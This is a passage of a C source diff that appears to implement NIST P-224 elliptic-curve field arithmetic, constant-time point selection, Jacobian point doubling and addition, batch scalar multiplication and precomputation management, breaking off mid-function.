+/* Assumes in[i] < 2^119 */
+static void widefelem_diff(widefelem out, const widefelem in)
+{
+    static const widelimb two120 = ((widelimb) 1) << 120;
+    static const widelimb two120m64 = (((widelimb) 1) << 120) -
+        (((widelimb) 1) << 64);
+    static const widelimb two120m104m64 = (((widelimb) 1) << 120) -
+        (((widelimb) 1) << 104) - (((widelimb) 1) << 64);
+
+    /* Add 0 mod 2^224-2^96+1 to ensure out > in */
+    out[0] += two120;
+    out[1] += two120m64;
+    out[2] += two120m64;
+    out[3] += two120;
+    out[4] += two120m104m64;
+    out[5] += two120m64;
+    out[6] += two120m64;
+
+    out[0] -= in[0];
+    out[1] -= in[1];
+    out[2] -= in[2];
+    out[3] -= in[3];
+    out[4] -= in[4];
+    out[5] -= in[5];
+    out[6] -= in[6];
+}
+
+/* Subtract in mixed mode: out128 -= in64 */
+/* in[i] < 2^63 */
+static void felem_diff_128_64(widefelem out, const felem in)
+{
+    static const widelimb two64p8 = (((widelimb) 1) << 64) +
+        (((widelimb) 1) << 8);
+    static const widelimb two64m8 = (((widelimb) 1) << 64) -
+        (((widelimb) 1) << 8);
+    static const widelimb two64m48m8 = (((widelimb) 1) << 64) -
+        (((widelimb) 1) << 48) - (((widelimb) 1) << 8);
+
+    /* Add 0 mod 2^224-2^96+1 to ensure out > in */
+    out[0] += two64p8;
+    out[1] += two64m48m8;
+    out[2] += two64m8;
+    out[3] += two64m8;
+
+    out[0] -= in[0];
+    out[1] -= in[1];
+    out[2] -= in[2];
+    out[3] -= in[3];
+}
+
+/*
+ * Multiply a field element by a scalar: out = out * scalar The scalars we
+ * actually use are small, so results fit without overflow
+ */
+static void felem_scalar(felem out, const limb scalar)
+{
+    out[0] *= scalar;
+    out[1] *= scalar;
+    out[2] *= scalar;
+    out[3] *= scalar;
+}
+
+/*
+ * Multiply an unreduced field element by a scalar: out = out * scalar The
+ * scalars we actually use are small, so results fit without overflow
+ */
+static void widefelem_scalar(widefelem out, const widelimb scalar)
+{
+    out[0] *= scalar;
+    out[1] *= scalar;
+    out[2] *= scalar;
+    out[3] *= scalar;
+    out[4] *= scalar;
+    out[5] *= scalar;
+    out[6] *= scalar;
+}
+
+/* Square a field element: out = in^2 */
+static void felem_square(widefelem out, const felem in)
+{
+    limb tmp0, tmp1, tmp2;
+    tmp0 = 2 * in[0];
+    tmp1 = 2 * in[1];
+    tmp2 = 2 * in[2];
+    out[0] = ((widelimb) in[0]) * in[0];
+    out[1] = ((widelimb) in[0]) * tmp1;
+    out[2] = ((widelimb) in[0]) * tmp2 + ((widelimb) in[1]) * in[1];
+    out[3] = ((widelimb) in[3]) * tmp0 + ((widelimb) in[1]) * tmp2;
+    out[4] = ((widelimb) in[3]) * tmp1 + ((widelimb) in[2]) * in[2];
+    out[5] = ((widelimb) in[3]) * tmp2;
+    out[6] = ((widelimb) in[3]) * in[3];
+}
+
+/* Multiply two field elements: out = in1 * in2 */
+static void felem_mul(widefelem out, const felem in1, const felem in2)
+{
+    out[0] = ((widelimb) in1[0]) * in2[0];
+    out[1] = ((widelimb) in1[0]) * in2[1] + ((widelimb) in1[1]) * in2[0];
+    out[2] = ((widelimb) in1[0]) * in2[2] + ((widelimb) in1[1]) * in2[1] +
+        ((widelimb) in1[2]) * in2[0];
+    out[3] = ((widelimb) in1[0]) * in2[3] + ((widelimb) in1[1]) * in2[2] +
+        ((widelimb) in1[2]) * in2[1] + ((widelimb) in1[3]) * in2[0];
+    out[4] = ((widelimb) in1[1]) * in2[3] + ((widelimb) in1[2]) * in2[2] +
+        ((widelimb) in1[3]) * in2[1];
+    out[5] = ((widelimb) in1[2]) * in2[3] + ((widelimb) in1[3]) * in2[2];
+    out[6] = ((widelimb) in1[3]) * in2[3];
+}
+
+/*-
+ * Reduce seven 128-bit coefficients to four 64-bit coefficients.
+ * Requires in[i] < 2^126,
+ * ensures out[0] < 2^56, out[1] < 2^56, out[2] < 2^56, out[3] <= 2^56 + 2^16 */
+static void felem_reduce(felem out, const widefelem in)
+{
+    static const widelimb two127p15 = (((widelimb) 1) << 127) +
+        (((widelimb) 1) << 15);
+    static const widelimb two127m71 = (((widelimb) 1) << 127) -
+        (((widelimb) 1) << 71);
+    static const widelimb two127m71m55 = (((widelimb) 1) << 127) -
+        (((widelimb) 1) << 71) - (((widelimb) 1) << 55);
+    widelimb output[5];
+
+    /* Add 0 mod 2^224-2^96+1 to ensure all differences are positive */
+    output[0] = in[0] + two127p15;
+    output[1] = in[1] + two127m71m55;
+    output[2] = in[2] + two127m71;
+    output[3] = in[3];
+    output[4] = in[4];
+
+    /* Eliminate in[4], in[5], in[6] */
+    output[4] += in[6] >> 16;
+    output[3] += (in[6] & 0xffff) << 40;
+    output[2] -= in[6];
+
+    output[3] += in[5] >> 16;
+    output[2] += (in[5] & 0xffff) << 40;
+    output[1] -= in[5];
+
+    output[2] += output[4] >> 16;
+    output[1] += (output[4] & 0xffff) << 40;
+    output[0] -= output[4];
+
+    /* Carry 2 -> 3 -> 4 */
+    output[3] += output[2] >> 56;
+    output[2] &= 0x00ffffffffffffff;
+
+    output[4] = output[3] >> 56;
+    output[3] &= 0x00ffffffffffffff;
+
+    /* Now output[2] < 2^56, output[3] < 2^56, output[4] < 2^72 */
+
+    /* Eliminate output[4] */
+    output[2] += output[4] >> 16;
+    /* output[2] < 2^56 + 2^56 = 2^57 */
+    output[1] += (output[4] & 0xffff) << 40;
+    output[0] -= output[4];
+
+    /* Carry 0 -> 1 -> 2 -> 3 */
+    output[1] += output[0] >> 56;
+    out[0] = output[0] & 0x00ffffffffffffff;
+
+    output[2] += output[1] >> 56;
+    /* output[2] < 2^57 + 2^72 */
+    out[1] = output[1] & 0x00ffffffffffffff;
+    output[3] += output[2] >> 56;
+    /* output[3] <= 2^56 + 2^16 */
+    out[2] = output[2] & 0x00ffffffffffffff;
+
+    /*-
+     * out[0] < 2^56, out[1] < 2^56, out[2] < 2^56,
+     * out[3] <= 2^56 + 2^16 (due to final carry),
+     * so out < 2*p
+     */
+    out[3] = output[3];
+}
+
+static void felem_square_reduce(felem out, const felem in)
+{
+    widefelem tmp;
+    felem_square(tmp, in);
+    felem_reduce(out, tmp);
+}
+
+static void felem_mul_reduce(felem out, const felem in1, const felem in2)
+{
+    widefelem tmp;
+    felem_mul(tmp, in1, in2);
+    felem_reduce(out, tmp);
+}
+
+/*
+ * Reduce to unique minimal representation. Requires 0 <= in < 2*p (always
+ * call felem_reduce first)
+ */
+static void felem_contract(felem out, const felem in)
+{
+    static const int64_t two56 = ((limb) 1) << 56;
+    /* 0 <= in < 2*p, p = 2^224 - 2^96 + 1 */
+    /* if in > p , reduce in = in - 2^224 + 2^96 - 1 */
+    int64_t tmp[4], a;
+    tmp[0] = in[0];
+    tmp[1] = in[1];
+    tmp[2] = in[2];
+    tmp[3] = in[3];
+    /* Case 1: a = 1 iff in >= 2^224 */
+    a = (in[3] >> 56);
+    tmp[0] -= a;
+    tmp[1] += a << 40;
+    tmp[3] &= 0x00ffffffffffffff;
+    /*
+     * Case 2: a = 0 iff p <= in < 2^224, i.e., the high 128 bits are all 1
+     * and the lower part is non-zero
+     */
+    a = ((in[3] & in[2] & (in[1] | 0x000000ffffffffff)) + 1) |
+        (((int64_t) (in[0] + (in[1] & 0x000000ffffffffff)) - 1) >> 63);
+    a &= 0x00ffffffffffffff;
+    /* turn a into an all-one mask (if a = 0) or an all-zero mask */
+    a = (a - 1) >> 63;
+    /* subtract 2^224 - 2^96 + 1 if a is all-one */
+    tmp[3] &= a ^ 0xffffffffffffffff;
+    tmp[2] &= a ^ 0xffffffffffffffff;
+    tmp[1] &= (a ^ 0xffffffffffffffff) | 0x000000ffffffffff;
+    tmp[0] -= 1 & a;
+
+    /*
+     * eliminate negative coefficients: if tmp[0] is negative, tmp[1] must be
+     * non-zero, so we only need one step
+     */
+    a = tmp[0] >> 63;
+    tmp[0] += two56 & a;
+    tmp[1] -= 1 & a;
+
+    /* carry 1 -> 2 -> 3 */
+    tmp[2] += tmp[1] >> 56;
+    tmp[1] &= 0x00ffffffffffffff;
+
+    tmp[3] += tmp[2] >> 56;
+    tmp[2] &= 0x00ffffffffffffff;
+
+    /* Now 0 <= out < p */
+    out[0] = tmp[0];
+    out[1] = tmp[1];
+    out[2] = tmp[2];
+    out[3] = tmp[3];
+}
+
+/*
+ * Zero-check: returns 1 if input is 0, and 0 otherwise. We know that field
+ * elements are reduced to in < 2^225, so we only need to check three cases:
+ * 0, 2^224 - 2^96 + 1, and 2^225 - 2^97 + 2
+ */
+static limb felem_is_zero(const felem in)
+{
+    limb zero, two224m96p1, two225m97p2;
+
+    zero = in[0] | in[1] | in[2] | in[3];
+    zero = (((int64_t) (zero) - 1) >> 63) & 1;
+    two224m96p1 = (in[0] ^ 1) | (in[1] ^ 0x00ffff0000000000)
+        | (in[2] ^ 0x00ffffffffffffff) | (in[3] ^ 0x00ffffffffffffff);
+    two224m96p1 = (((int64_t) (two224m96p1) - 1) >> 63) & 1;
+    two225m97p2 = (in[0] ^ 2) | (in[1] ^ 0x00fffe0000000000)
+        | (in[2] ^ 0x00ffffffffffffff) | (in[3] ^ 0x01ffffffffffffff);
+    two225m97p2 = (((int64_t) (two225m97p2) - 1) >> 63) & 1;
+    return (zero | two224m96p1 | two225m97p2);
+}
+
+static limb felem_is_zero_int(const felem in)
+{
+    return (int)(felem_is_zero(in) & ((limb) 1));
+}
+
+/* Invert a field element */
+/* Computation chain copied from djb's code */
+static void felem_inv(felem out, const felem in)
+{
+    felem ftmp, ftmp2, ftmp3, ftmp4;
+    widefelem tmp;
+    unsigned i;
+
+    felem_square(tmp, in);
+    felem_reduce(ftmp, tmp);    /* 2 */
+    felem_mul(tmp, in, ftmp);
+    felem_reduce(ftmp, tmp);    /* 2^2 - 1 */
+    felem_square(tmp, ftmp);
+    felem_reduce(ftmp, tmp);    /* 2^3 - 2 */
+    felem_mul(tmp, in, ftmp);
+    felem_reduce(ftmp, tmp);    /* 2^3 - 1 */
+    felem_square(tmp, ftmp);
+    felem_reduce(ftmp2, tmp);   /* 2^4 - 2 */
+    felem_square(tmp, ftmp2);
+    felem_reduce(ftmp2, tmp);   /* 2^5 - 4 */
+    felem_square(tmp, ftmp2);
+    felem_reduce(ftmp2, tmp);   /* 2^6 - 8 */
+    felem_mul(tmp, ftmp2, ftmp);
+    felem_reduce(ftmp, tmp);    /* 2^6 - 1 */
+    felem_square(tmp, ftmp);
+    felem_reduce(ftmp2, tmp);   /* 2^7 - 2 */
+    for (i = 0; i < 5; ++i) {   /* 2^12 - 2^6 */
+        felem_square(tmp, ftmp2);
+        felem_reduce(ftmp2, tmp);
+    }
+    felem_mul(tmp, ftmp2, ftmp);
+    felem_reduce(ftmp2, tmp);   /* 2^12 - 1 */
+    felem_square(tmp, ftmp2);
+    felem_reduce(ftmp3, tmp);   /* 2^13 - 2 */
+    for (i = 0; i < 11; ++i) {  /* 2^24 - 2^12 */
+        felem_square(tmp, ftmp3);
+        felem_reduce(ftmp3, tmp);
+    }
+    felem_mul(tmp, ftmp3, ftmp2);
+    felem_reduce(ftmp2, tmp);   /* 2^24 - 1 */
+    felem_square(tmp, ftmp2);
+    felem_reduce(ftmp3, tmp);   /* 2^25 - 2 */
+    for (i = 0; i < 23; ++i) {  /* 2^48 - 2^24 */
+        felem_square(tmp, ftmp3);
+        felem_reduce(ftmp3, tmp);
+    }
+    felem_mul(tmp, ftmp3, ftmp2);
+    felem_reduce(ftmp3, tmp);   /* 2^48 - 1 */
+    felem_square(tmp, ftmp3);
+    felem_reduce(ftmp4, tmp);   /* 2^49 - 2 */
+    for (i = 0; i < 47; ++i) {  /* 2^96 - 2^48 */
+        felem_square(tmp, ftmp4);
+        felem_reduce(ftmp4, tmp);
+    }
+    felem_mul(tmp, ftmp3, ftmp4);
+    felem_reduce(ftmp3, tmp);   /* 2^96 - 1 */
+    felem_square(tmp, ftmp3);
+    felem_reduce(ftmp4, tmp);   /* 2^97 - 2 */
+    for (i = 0; i < 23; ++i) {  /* 2^120 - 2^24 */
+        felem_square(tmp, ftmp4);
+        felem_reduce(ftmp4, tmp);
+    }
+    felem_mul(tmp, ftmp2, ftmp4);
+    felem_reduce(ftmp2, tmp);   /* 2^120 - 1 */
+    for (i = 0; i < 6; ++i) {   /* 2^126 - 2^6 */
+        felem_square(tmp, ftmp2);
+        felem_reduce(ftmp2, tmp);
+    }
+    felem_mul(tmp, ftmp2, ftmp);
+    felem_reduce(ftmp, tmp);    /* 2^126 - 1 */
+    felem_square(tmp, ftmp);
+    felem_reduce(ftmp, tmp);    /* 2^127 - 2 */
+    felem_mul(tmp, ftmp, in);
+    felem_reduce(ftmp, tmp);    /* 2^127 - 1 */
+    for (i = 0; i < 97; ++i) {  /* 2^224 - 2^97 */
+        felem_square(tmp, ftmp);
+        felem_reduce(ftmp, tmp);
+    }
+    felem_mul(tmp, ftmp, ftmp3);
+    felem_reduce(out, tmp);     /* 2^224 - 2^96 - 1 */
+}
+
+/*
+ * Copy in constant time: if icopy == 1, copy in to out, if icopy == 0, copy
+ * out to itself.
+ */
+static void copy_conditional(felem out, const felem in, limb icopy)
+{
+    unsigned i;
+    /*
+     * icopy is a (64-bit) 0 or 1, so copy is either all-zero or all-one
+     */
+    const limb copy = -icopy;
+    for (i = 0; i < 4; ++i) {
+        const limb tmp = copy & (in[i] ^ out[i]);
+        out[i] ^= tmp;
+    }
+}
+
+/******************************************************************************/
+/*-
+ *                       ELLIPTIC CURVE POINT OPERATIONS
+ *
+ * Points are represented in Jacobian projective coordinates:
+ * (X, Y, Z) corresponds to the affine point (X/Z^2, Y/Z^3),
+ * or to the point at infinity if Z == 0.
+ *
+ */
+
+/*-
+ * Double an elliptic curve point:
+ * (X', Y', Z') = 2 * (X, Y, Z), where
+ * X' = (3 * (X - Z^2) * (X + Z^2))^2 - 8 * X * Y^2
+ * Y' = 3 * (X - Z^2) * (X + Z^2) * (4 * X * Y^2 - X') - 8 * Y^2
+ * Z' = (Y + Z)^2 - Y^2 - Z^2 = 2 * Y * Z
+ * Outputs can equal corresponding inputs, i.e., x_out == x_in is allowed,
+ * while x_out == y_in is not (maybe this works, but it's not tested).
+ */
+static void
+point_double(felem x_out, felem y_out, felem z_out,
+             const felem x_in, const felem y_in, const felem z_in)
+{
+    widefelem tmp, tmp2;
+    felem delta, gamma, beta, alpha, ftmp, ftmp2;
+
+    felem_assign(ftmp, x_in);
+    felem_assign(ftmp2, x_in);
+
+    /* delta = z^2 */
+    felem_square(tmp, z_in);
+    felem_reduce(delta, tmp);
+
+    /* gamma = y^2 */
+    felem_square(tmp, y_in);
+    felem_reduce(gamma, tmp);
+
+    /* beta = x*gamma */
+    felem_mul(tmp, x_in, gamma);
+    felem_reduce(beta, tmp);
+
+    /* alpha = 3*(x-delta)*(x+delta) */
+    felem_diff(ftmp, delta);
+    /* ftmp[i] < 2^57 + 2^58 + 2 < 2^59 */
+    felem_sum(ftmp2, delta);
+    /* ftmp2[i] < 2^57 + 2^57 = 2^58 */
+    felem_scalar(ftmp2, 3);
+    /* ftmp2[i] < 3 * 2^58 < 2^60 */
+    felem_mul(tmp, ftmp, ftmp2);
+    /* tmp[i] < 2^60 * 2^59 * 4 = 2^121 */
+    felem_reduce(alpha, tmp);
+
+    /* x' = alpha^2 - 8*beta */
+    felem_square(tmp, alpha);
+    /* tmp[i] < 4 * 2^57 * 2^57 = 2^116 */
+    felem_assign(ftmp, beta);
+    felem_scalar(ftmp, 8);
+    /* ftmp[i] < 8 * 2^57 = 2^60 */
+    felem_diff_128_64(tmp, ftmp);
+    /* tmp[i] < 2^116 + 2^64 + 8 < 2^117 */
+    felem_reduce(x_out, tmp);
+
+    /* z' = (y + z)^2 - gamma - delta */
+    felem_sum(delta, gamma);
+    /* delta[i] < 2^57 + 2^57 = 2^58 */
+    felem_assign(ftmp, y_in);
+    felem_sum(ftmp, z_in);
+    /* ftmp[i] < 2^57 + 2^57 = 2^58 */
+    felem_square(tmp, ftmp);
+    /* tmp[i] < 4 * 2^58 * 2^58 = 2^118 */
+    felem_diff_128_64(tmp, delta);
+    /* tmp[i] < 2^118 + 2^64 + 8 < 2^119 */
+    felem_reduce(z_out, tmp);
+
+    /* y' = alpha*(4*beta - x') - 8*gamma^2 */
+    felem_scalar(beta, 4);
+    /* beta[i] < 4 * 2^57 = 2^59 */
+    felem_diff(beta, x_out);
+    /* beta[i] < 2^59 + 2^58 + 2 < 2^60 */
+    felem_mul(tmp, alpha, beta);
+    /* tmp[i] < 4 * 2^57 * 2^60 = 2^119 */
+    felem_square(tmp2, gamma);
+    /* tmp2[i] < 4 * 2^57 * 2^57 = 2^116 */
+    widefelem_scalar(tmp2, 8);
+    /* tmp2[i] < 8 * 2^116 = 2^119 */
+    widefelem_diff(tmp, tmp2);
+    /* tmp[i] < 2^119 + 2^120 < 2^121 */
+    felem_reduce(y_out, tmp);
+}
+
+/*-
+ * Add two elliptic curve points:
+ * (X_1, Y_1, Z_1) + (X_2, Y_2, Z_2) = (X_3, Y_3, Z_3), where
+ * X_3 = (Z_1^3 * Y_2 - Z_2^3 * Y_1)^2 - (Z_1^2 * X_2 - Z_2^2 * X_1)^3 -
+ * 2 * Z_2^2 * X_1 * (Z_1^2 * X_2 - Z_2^2 * X_1)^2
+ * Y_3 = (Z_1^3 * Y_2 - Z_2^3 * Y_1) * (Z_2^2 * X_1 * (Z_1^2 * X_2 - Z_2^2 * X_1)^2 - X_3) -
+ *        Z_2^3 * Y_1 * (Z_1^2 * X_2 - Z_2^2 * X_1)^3
+ * Z_3 = (Z_1^2 * X_2 - Z_2^2 * X_1) * (Z_1 * Z_2)
+ *
+ * This runs faster if 'mixed' is set, which requires Z_2 = 1 or Z_2 = 0.
+ */
+
+/*
+ * This function is not entirely constant-time: it includes a branch for
+ * checking whether the two input points are equal, (while not equal to the
+ * point at infinity). This case never happens during single point
+ * multiplication, so there is no timing leak for ECDH or ECDSA signing.
+ */
+static void point_add(felem x3, felem y3, felem z3,
+                      const felem x1, const felem y1, const felem z1,
+                      const int mixed, const felem x2, const felem y2,
+                      const felem z2)
+{
+    felem ftmp, ftmp2, ftmp3, ftmp4, ftmp5, x_out, y_out, z_out;
+    widefelem tmp, tmp2;
+    limb z1_is_zero, z2_is_zero, x_equal, y_equal;
+
+    if (!mixed) {
+        /* ftmp2 = z2^2 */
+        felem_square(tmp, z2);
+        felem_reduce(ftmp2, tmp);
+
+        /* ftmp4 = z2^3 */
+        felem_mul(tmp, ftmp2, z2);
+        felem_reduce(ftmp4, tmp);
+
+        /* ftmp4 = z2^3*y1 */
+        felem_mul(tmp2, ftmp4, y1);
+        felem_reduce(ftmp4, tmp2);
+
+        /* ftmp2 = z2^2*x1 */
+        felem_mul(tmp2, ftmp2, x1);
+        felem_reduce(ftmp2, tmp2);
+    } else {
+        /*
+         * We'll assume z2 = 1 (special case z2 = 0 is handled later)
+         */
+
+        /* ftmp4 = z2^3*y1 */
+        felem_assign(ftmp4, y1);
+
+        /* ftmp2 = z2^2*x1 */
+        felem_assign(ftmp2, x1);
+    }
+
+    /* ftmp = z1^2 */
+    felem_square(tmp, z1);
+    felem_reduce(ftmp, tmp);
+
+    /* ftmp3 = z1^3 */
+    felem_mul(tmp, ftmp, z1);
+    felem_reduce(ftmp3, tmp);
+
+    /* tmp = z1^3*y2 */
+    felem_mul(tmp, ftmp3, y2);
+    /* tmp[i] < 4 * 2^57 * 2^57 = 2^116 */
+
+    /* ftmp3 = z1^3*y2 - z2^3*y1 */
+    felem_diff_128_64(tmp, ftmp4);
+    /* tmp[i] < 2^116 + 2^64 + 8 < 2^117 */
+    felem_reduce(ftmp3, tmp);
+
+    /* tmp = z1^2*x2 */
+    felem_mul(tmp, ftmp, x2);
+    /* tmp[i] < 4 * 2^57 * 2^57 = 2^116 */
+
+    /* ftmp = z1^2*x2 - z2^2*x1 */
+    felem_diff_128_64(tmp, ftmp2);
+    /* tmp[i] < 2^116 + 2^64 + 8 < 2^117 */
+    felem_reduce(ftmp, tmp);
+
+    /*
+     * the formulae are incorrect if the points are equal so we check for
+     * this and do doubling if this happens
+     */
+    x_equal = felem_is_zero(ftmp);
+    y_equal = felem_is_zero(ftmp3);
+    z1_is_zero = felem_is_zero(z1);
+    z2_is_zero = felem_is_zero(z2);
+    /* In affine coordinates, (X_1, Y_1) == (X_2, Y_2) */
+    if (x_equal && y_equal && !z1_is_zero && !z2_is_zero) {
+        point_double(x3, y3, z3, x1, y1, z1);
+        return;
+    }
+
+    /* ftmp5 = z1*z2 */
+    if (!mixed) {
+        felem_mul(tmp, z1, z2);
+        felem_reduce(ftmp5, tmp);
+    } else {
+        /* special case z2 = 0 is handled later */
+        felem_assign(ftmp5, z1);
+    }
+
+    /* z_out = (z1^2*x2 - z2^2*x1)*(z1*z2) */
+    felem_mul(tmp, ftmp, ftmp5);
+    felem_reduce(z_out, tmp);
+
+    /* ftmp = (z1^2*x2 - z2^2*x1)^2 */
+    felem_assign(ftmp5, ftmp);
+    felem_square(tmp, ftmp);
+    felem_reduce(ftmp, tmp);
+
+    /* ftmp5 = (z1^2*x2 - z2^2*x1)^3 */
+    felem_mul(tmp, ftmp, ftmp5);
+    felem_reduce(ftmp5, tmp);
+
+    /* ftmp2 = z2^2*x1*(z1^2*x2 - z2^2*x1)^2 */
+    felem_mul(tmp, ftmp2, ftmp);
+    felem_reduce(ftmp2, tmp);
+
+    /* tmp = z2^3*y1*(z1^2*x2 - z2^2*x1)^3 */
+    felem_mul(tmp, ftmp4, ftmp5);
+    /* tmp[i] < 4 * 2^57 * 2^57 = 2^116 */
+
+    /* tmp2 = (z1^3*y2 - z2^3*y1)^2 */
+    felem_square(tmp2, ftmp3);
+    /* tmp2[i] < 4 * 2^57 * 2^57 < 2^116 */
+
+    /* tmp2 = (z1^3*y2 - z2^3*y1)^2 - (z1^2*x2 - z2^2*x1)^3 */
+    felem_diff_128_64(tmp2, ftmp5);
+    /* tmp2[i] < 2^116 + 2^64 + 8 < 2^117 */
+
+    /* ftmp5 = 2*z2^2*x1*(z1^2*x2 - z2^2*x1)^2 */
+    felem_assign(ftmp5, ftmp2);
+    felem_scalar(ftmp5, 2);
+    /* ftmp5[i] < 2 * 2^57 = 2^58 */
+
+    /*-
+     * x_out = (z1^3*y2 - z2^3*y1)^2 - (z1^2*x2 - z2^2*x1)^3 -
+     *  2*z2^2*x1*(z1^2*x2 - z2^2*x1)^2
+     */
+    felem_diff_128_64(tmp2, ftmp5);
+    /* tmp2[i] < 2^117 + 2^64 + 8 < 2^118 */
+    felem_reduce(x_out, tmp2);
+
+    /* ftmp2 = z2^2*x1*(z1^2*x2 - z2^2*x1)^2 - x_out */
+    felem_diff(ftmp2, x_out);
+    /* ftmp2[i] < 2^57 + 2^58 + 2 < 2^59 */
+
+    /*
+     * tmp2 = (z1^3*y2 - z2^3*y1)*(z2^2*x1*(z1^2*x2 - z2^2*x1)^2 - x_out)
+     */
+    felem_mul(tmp2, ftmp3, ftmp2);
+    /* tmp2[i] < 4 * 2^57 * 2^59 = 2^118 */
+
+    /*-
+     * y_out = (z1^3*y2 - z2^3*y1)*(z2^2*x1*(z1^2*x2 - z2^2*x1)^2 - x_out) -
+     *  z2^3*y1*(z1^2*x2 - z2^2*x1)^3
+     */
+    widefelem_diff(tmp2, tmp);
+    /* tmp2[i] < 2^118 + 2^120 < 2^121 */
+    felem_reduce(y_out, tmp2);
+
+    /*
+     * the result (x_out, y_out, z_out) is incorrect if one of the inputs is
+     * the point at infinity, so we need to check for this separately
+     */
+
+    /*
+     * if point 1 is at infinity, copy point 2 to output, and vice versa
+     */
+    copy_conditional(x_out, x2, z1_is_zero);
+    copy_conditional(x_out, x1, z2_is_zero);
+    copy_conditional(y_out, y2, z1_is_zero);
+    copy_conditional(y_out, y1, z2_is_zero);
+    copy_conditional(z_out, z2, z1_is_zero);
+    copy_conditional(z_out, z1, z2_is_zero);
+    felem_assign(x3, x_out);
+    felem_assign(y3, y_out);
+    felem_assign(z3, z_out);
+}
+
+/*
+ * select_point selects the |idx|th point from a precomputation table and
+ * copies it to out.
+ * The pre_comp array argument should be size of |size| argument
+ */
+static void select_point(const u64 idx, unsigned int size,
+                         const felem pre_comp[][3], felem out[3])
+{
+    unsigned i, j;
+    limb *outlimbs = &out[0][0];
+    memset(outlimbs, 0, 3 * sizeof(felem));
+
+    for (i = 0; i < size; i++) {
+        const limb *inlimbs = &pre_comp[i][0][0];
+        u64 mask = i ^ idx;
+        mask |= mask >> 4;
+        mask |= mask >> 2;
+        mask |= mask >> 1;
+        mask &= 1;
+        mask--;
+        for (j = 0; j < 4 * 3; j++)
+            outlimbs[j] |= inlimbs[j] & mask;
+    }
+}
+
+/* get_bit returns the |i|th bit in |in| */
+static char get_bit(const felem_bytearray in, unsigned i)
+{
+    if (i >= 224)
+        return 0;
+    return (in[i >> 3] >> (i & 7)) & 1;
+}
+
+/*
+ * Interleaved point multiplication using precomputed point multiples: The
+ * small point multiples 0*P, 1*P, ..., 16*P are in pre_comp[], the scalars
+ * in scalars[]. If g_scalar is non-NULL, we also add this multiple of the
+ * generator, using certain (large) precomputed multiples in g_pre_comp.
+ * Output point (X, Y, Z) is stored in x_out, y_out, z_out
+ */
+static void batch_mul(felem x_out, felem y_out, felem z_out,
+                      const felem_bytearray scalars[],
+                      const unsigned num_points, const u8 *g_scalar,
+                      const int mixed, const felem pre_comp[][17][3],
+                      const felem g_pre_comp[2][16][3])
+{
+    int i, skip;
+    unsigned num;
+    unsigned gen_mul = (g_scalar != NULL);
+    felem nq[3], tmp[4];
+    u64 bits;
+    u8 sign, digit;
+
+    /* set nq to the point at infinity */
+    memset(nq, 0, 3 * sizeof(felem));
+
+    /*
+     * Loop over all scalars msb-to-lsb, interleaving additions of multiples
+     * of the generator (two in each of the last 28 rounds) and additions of
+     * other points multiples (every 5th round).
+     */
+    skip = 1;                   /* save two point operations in the first
+                                 * round */
+    for (i = (num_points ? 220 : 27); i >= 0; --i) {
+        /* double */
+        if (!skip)
+            point_double(nq[0], nq[1], nq[2], nq[0], nq[1], nq[2]);
+
+        /* add multiples of the generator */
+        if (gen_mul && (i <= 27)) {
+            /* first, look 28 bits upwards */
+            bits = get_bit(g_scalar, i + 196) << 3;
+            bits |= get_bit(g_scalar, i + 140) << 2;
+            bits |= get_bit(g_scalar, i + 84) << 1;
+            bits |= get_bit(g_scalar, i + 28);
+            /* select the point to add, in constant time */
+            select_point(bits, 16, g_pre_comp[1], tmp);
+
+            if (!skip) {
+                /* value 1 below is argument for "mixed" */
+                point_add(nq[0], nq[1], nq[2],
+                          nq[0], nq[1], nq[2], 1, tmp[0], tmp[1], tmp[2]);
+            } else {
+                memcpy(nq, tmp, 3 * sizeof(felem));
+                skip = 0;
+            }
+
+            /* second, look at the current position */
+            bits = get_bit(g_scalar, i + 168) << 3;
+            bits |= get_bit(g_scalar, i + 112) << 2;
+            bits |= get_bit(g_scalar, i + 56) << 1;
+            bits |= get_bit(g_scalar, i);
+            /* select the point to add, in constant time */
+            select_point(bits, 16, g_pre_comp[0], tmp);
+            point_add(nq[0], nq[1], nq[2],
+                      nq[0], nq[1], nq[2],
+                      1 /* mixed */ , tmp[0], tmp[1], tmp[2]);
+        }
+
+        /* do other additions every 5 doublings */
+        if (num_points && (i % 5 == 0)) {
+            /* loop over all scalars */
+            for (num = 0; num < num_points; ++num) {
+                bits = get_bit(scalars[num], i + 4) << 5;
+                bits |= get_bit(scalars[num], i + 3) << 4;
+                bits |= get_bit(scalars[num], i + 2) << 3;
+                bits |= get_bit(scalars[num], i + 1) << 2;
+                bits |= get_bit(scalars[num], i) << 1;
+                bits |= get_bit(scalars[num], i - 1);
+                ec_GFp_nistp_recode_scalar_bits(&sign, &digit, bits);
+
+                /* select the point to add or subtract */
+                select_point(digit, 17, pre_comp[num], tmp);
+                felem_neg(tmp[3], tmp[1]); /* (X, -Y, Z) is the negative
+                                            * point */
+                copy_conditional(tmp[1], tmp[3], sign);
+
+                if (!skip) {
+                    point_add(nq[0], nq[1], nq[2],
+                              nq[0], nq[1], nq[2],
+                              mixed, tmp[0], tmp[1], tmp[2]);
+                } else {
+                    memcpy(nq, tmp, 3 * sizeof(felem));
+                    skip = 0;
+                }
+            }
+        }
+    }
+    felem_assign(x_out, nq[0]);
+    felem_assign(y_out, nq[1]);
+    felem_assign(z_out, nq[2]);
+}
+
+/******************************************************************************/
+/*
+ * FUNCTIONS TO MANAGE PRECOMPUTATION
+ */
+
+static NISTP224_PRE_COMP *nistp224_pre_comp_new()
+{
+    NISTP224_PRE_COMP *ret = NULL;
+    ret = (NISTP224_PRE_COMP *) OPENSSL_malloc(sizeof *ret);
+    if (!ret) {
+        ECerr(EC_F_NISTP224_PRE_COMP_NEW, ERR_R_MALLOC_FAILURE);
+        return ret;
+    }
+    memset(ret->g_pre_comp, 0, sizeof(ret->g_pre_comp));
+    ret->references = 1;
+    return ret;
+}
+
+static void *nistp224_pre_comp_dup(void *src_)
+{
+    NISTP224_PRE_COMP *src = src_;
+
+    /* no need to actually copy, these objects never change! */
+    CRYPTO_add(&src->references, 1, CRYPTO_LOCK_EC_PRE_COMP);
+
+    return src_;
+}
+
+static void nistp224_pre_comp_free(void *pre_)
+{
+    int i;
+    NISTP224_PRE_COMP *pre = pre_;
+
+    if (!pre)
+        return;
+
+    i = CRYPTO_add(&pre->references, -1, CRYPTO_LOCK_EC_PRE_COMP);
+    if (i > 0)
+        return;
+
+    OPENSSL_free(pre);
+}
+
+static void nistp224_pre_comp_clear_free(void *pre_)
+{
+    int i;
+    NISTP224_PRE_COMP *pre = pre_;
+
+    if (!pre)
+        return;
+
+    i = CRYPTO_add(&pre->references, -1, CRYPTO_LOCK_EC_PRE_COMP);
